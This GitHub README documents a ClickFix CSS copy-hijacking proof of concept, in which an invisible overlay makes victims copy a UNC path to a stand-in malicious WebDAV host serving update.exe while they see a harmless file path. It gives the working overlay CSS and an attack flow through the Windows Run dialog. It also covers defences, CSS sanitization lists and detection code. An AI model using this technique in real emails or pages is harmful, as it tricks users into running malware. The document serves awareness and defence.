0xagil/Clickfix-Email

ClickFix Email Attack - CSS Copy Hijacking Proof of Concept

Overview

This repository contains a proof of concept demonstrating the ClickFix attack technique - a CSS-based social engineering attack where visible text differs from the actual copied content. This technique exploits browser text selection and CSS positioning to deceive users into copying malicious content while believing they're copying legitimate information.

Based on the research shared by MalwareTech: https://www.linkedin.com/posts/malwaretech_heres-a-proof-of-concept-phishing-email-activity-7388266743720435712-9fo5

This implementation extends and documents the ClickFix technique for educational and defensive security purposes.

⚠️ Disclaimer

This is for educational and security research purposes only. This demonstrates the ClickFix attack technique - a real security vulnerability that has been exploited for phishing, social engineering, and malware distribution. Never use this technique for malicious purposes. Understanding this attack helps security professionals and developers build better defenses.

How It Works

The ClickFix Technique

The ClickFix attack uses CSS to layer invisible, selectable text over visible text:

  1. Visible Layer: Displays legitimate-looking content (e.g., a local file path)
  2. Hidden Overlay: Contains malicious content positioned exactly over the visible text
  3. CSS Manipulation: The overlay is made transparent but remains selectable
  4. User Deception: When users select and copy, they capture the hidden overlay instead of the visible text

Technical Implementation

/* Visible text - what the user sees */
.visible-text {
    padding: 12px 20px;
    background-color: #f0f0f0;
    border: 2px solid #ddd;
    font-family: 'Courier New', monospace;
    color: #333;
}

/* Hidden overlay - what gets copied */
.hidden-overlay {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    padding: 12px 20px;
    color: rgba(0, 0, 0, 0);  /* Completely transparent */
    background: transparent;
    font-family: 'Courier New', monospace;
    z-index: 10;  /* Positioned above visible text */
    user-select: text;  /* Still selectable */
}

/* Selection styling to look normal */
.hidden-overlay::selection {
    background-color: #0066cc;
    color: transparent;
}

Key CSS Properties

  • position: absolute - Positions overlay on top of visible text
  • color: rgba(0, 0, 0, 0) - Makes text completely transparent
  • z-index: 10 - Ensures overlay is above visible text
  • user-select: text - Keeps text selectable despite transparency
  • ::selection pseudo-element - Styles the selection highlight

Attack Scenario

Example: Malicious File Path Substitution

What the victim sees:

C:\Users\Public\Documents\Q4_Report_2025.pdf

What the victim actually copies:

\\webdav-server.malicious.com\share\update.exe

Attack Flow

  1. Email Delivery: Victim receives HTML email appearing to be from IT support
  2. Social Engineering: Email instructs user to copy a file path to access a document
  3. Visual Deception: User sees a legitimate local Windows file path
  4. Copy Action: User selects and copies what appears to be the safe path
  5. Paste & Execute: User pastes into Run dialog (Win+R) or File Explorer
  6. Exploitation: Windows interprets the UNC path, connects to the malicious WebDAV server, and attempts to execute the malware

Why This Works

Browser Behavior

  • Browsers prioritize the topmost selectable element when determining what to copy
  • CSS can make elements invisible while preserving their selectability
  • The ::selection pseudo-element can style selections to appear normal
  • No JavaScript required - pure CSS exploitation

User Psychology

  • Users trust what they see on screen
  • File paths appear technical and legitimate
  • Copy-paste is considered a "safe" operation
  • Most users don't verify clipboard contents before pasting

Potential Use Cases (Malicious)

⚠️ For awareness only - do not implement:

  1. Credential Harvesting: Display legitimate URL, copy phishing URL
  2. Malware Distribution: Display safe file path, copy malicious UNC path
  3. Command Injection: Display safe command, copy malicious script
  4. API Key Theft: Display example key, copy attacker's webhook URL
  5. Cryptocurrency Scams: Display one wallet address, copy attacker's address

Defense Mechanisms

For Users

  1. Always Paste into Notepad First: Verify clipboard contents before executing
  2. Check for UNC Paths: Be suspicious of paths starting with \\
  3. Verify Email Sources: Confirm legitimacy through alternative channels
  4. Avoid Copy-Paste from Emails: Manually type sensitive paths or commands
  5. Use Plain Text Email Clients: Many strip dangerous HTML/CSS

For Developers

  1. Sanitize HTML/CSS in Emails:

    // Strip dangerous CSS properties
    const dangerousProps = ['position', 'z-index', 'opacity', 'user-select'];

  2. Content Security Policy (CSP):

    <meta http-equiv="Content-Security-Policy" content="style-src 'self'">

  3. Email Client Configuration:

    • Disable HTML emails by default
    • Strip absolute/relative positioning
    • Remove transparency properties
    • Limit z-index usage

  4. User Education:

    • Train users to recognize phishing attempts
    • Promote clipboard verification habits
    • Demonstrate this attack in security awareness training

For Email Service Providers

  1. CSS Filtering: Block or strip dangerous CSS properties in HTML emails
  2. Warning Indicators: Flag emails with suspicious CSS patterns
  3. Sandbox Rendering: Render emails in isolated environments
  4. Plain Text Fallback: Offer plain text version prominently
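
One way to implement the CSS filtering and flagging described in the developer and provider lists above, as an added example that is not part of the original repository: it scans an email's `<style>` blocks and inline `style` attributes for declarations that combine invisible text with absolute or fixed positioning. The function names and the sample email are constructed for illustration, and the regex-based parsing is a heuristic, not a full CSS parser.

```javascript
// Added example: flag CSS that pairs invisible text with overlay positioning.
// All names and SAMPLE_EMAIL are constructed for illustration; regex parsing is a heuristic.
function parseDeclarations(block) {
  const decls = {};
  for (const part of block.split(';')) {
    const i = part.indexOf(':');
    if (i > 0) decls[part.slice(0, i).trim().toLowerCase()] = part.slice(i + 1).trim().toLowerCase();
  }
  return decls;
}

// True when a functional colour has a fourth (alpha) component equal to zero.
function alphaIsZero(color) {
  const m = /^(?:rgb|hsl)a?\(([^)]*)\)$/.exec(color);
  if (!m) return false;
  const parts = m[1].split(/[\s,\/]+/).filter(Boolean);
  return parts.length === 4 && parseFloat(parts[3]) === 0;
}

// Invisible but still selectable text, lifted out of normal flow: the overlay pattern.
function isHiddenOverlay(d) {
  const color = d['color'] || '';
  const invisible = color === 'transparent' || alphaIsZero(color) ||
    /^#(?:[0-9a-f]{3}0|[0-9a-f]{6}00)$/.test(color) || parseFloat(d['opacity']) === 0;
  const layered = d['position'] === 'absolute' || d['position'] === 'fixed';
  return invisible && layered && d['user-select'] !== 'none';
}

// Returns { where, declarations } for every suspicious rule or inline style.
function findHiddenOverlays(html) {
  const findings = [];
  const check = (where, block) => {
    const d = parseDeclarations(block);
    if (isHiddenOverlay(d)) findings.push({ where, declarations: d });
  };
  for (const style of html.matchAll(/<style[^>]*>([\s\S]*?)<\/style>/gi)) {
    const css = style[1].replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments first
    for (const rule of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) check(rule[1].trim(), rule[2]);
  }
  for (const attr of html.matchAll(/\sstyle\s*=\s*"([^"]*)"/gi)) check('inline style', attr[1]);
  return findings;
}
// Constructed sample: the page's overlay rule, a benign rule, and an inline variant.
const SAMPLE_EMAIL = `<style>
.visible-text { padding: 12px 20px; color: #333; }
.hidden-overlay { position: absolute; color: rgba(0, 0, 0, 0); /* transparent */ z-index: 10; user-select: text; }
.hidden-overlay::selection { background-color: #0066cc; color: transparent; }
</style>
<div style="position:relative"><span style="position: absolute; opacity: 0">overlay text</span></div>`;
console.log(findHiddenOverlays(SAMPLE_EMAIL).map((f) => f.where));
```

Treat a hit as a signal for flagging or stripping, not as proof of malice; the heuristic does not resolve the cascade or external stylesheets.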

Technical Limitations

Where This Attack Fails

  • Plain Text Emails: No CSS support
  • Strict Email Clients: Gmail, Outlook strip many CSS properties
  • Mobile Devices: Selection behavior differs, may not work consistently
  • Browser Extensions: Some security extensions detect this pattern
  • Developer Tools: Inspecting element reveals the overlay

Detection Methods

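// Detect overlapping selectable elements
const detectOverlay = (element) => {
    const rect = element.getBoundingClientRect();
    // Probe the centre of the element; the top-left corner can land on a border or a neighbour
    const topElement = document.elementFromPoint(rect.x + rect.width / 2, rect.y + rect.height / 2);
    if (!topElement || topElement === element || element.contains(topElement)) return false;
    // element.style.zIndex is a string and is empty for stylesheet rules, so compare computed values
    const z = (el) => parseInt(getComputedStyle(el).zIndex, 10) || 0;
    return z(topElement) > z(element);
};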

File Structure

proof_of_concept.eml                # ClickFix attack HTML email demonstration
CSS_COPY_HIJACKING_README.md        # This documentation

Testing the Proof of Concept

  1. Open proof_of_concept.eml in a web browser or email client that supports HTML
  2. Locate the file path field in the ClickFix demonstration
  3. Select and copy the text
  4. Paste into Notepad to see the actual copied content
  5. DO NOT paste into Run dialog or File Explorer - it contains a malicious path

Real-World Impact

Why This Matters

  • Bypasses Traditional Security: No malware in the email itself
  • User Trust Exploitation: Leverages copy-paste as "safe" operation
  • Wide Attack Surface: Any HTML-capable email client or web application
  • Low Detection Rate: Security tools may not flag CSS-only attacks
  • High Success Rate: Users rarely verify clipboard contents

Historical Context

Similar CSS-based attacks have been documented since the early 2010s, but remain effective due to:

  • Evolving CSS capabilities
  • Inconsistent email client security policies
  • Low user awareness
  • Difficulty in automated detection

Mitigation Roadmap

Immediate Actions

  1. Deploy email filtering rules to strip dangerous CSS
  2. Update security awareness training materials
  3. Implement clipboard verification prompts for sensitive operations

Long-term Solutions

  1. Browser-level clipboard permissions for HTML content
  2. Standardized email security policies across clients
  3. Visual indicators for clipboard content mismatches
  4. Operating system warnings for UNC path execution

References & Further Reading

  • Original Research: MalwareTech LinkedIn Post - ClickFix Email Attack POC
  • ClickFix Attack Technique Documentation
  • OWASP: Social Engineering Attacks
  • Microsoft: Email Security Best Practices
  • CSS Specification: Selection and User Interaction
  • WebDAV Security Considerations
  • UNC Path Exploitation Techniques

Credits

This proof of concept is inspired by and based on the ClickFix attack technique research shared by MalwareTech, demonstrating how CSS overlay techniques can be exploited for phishing attacks.
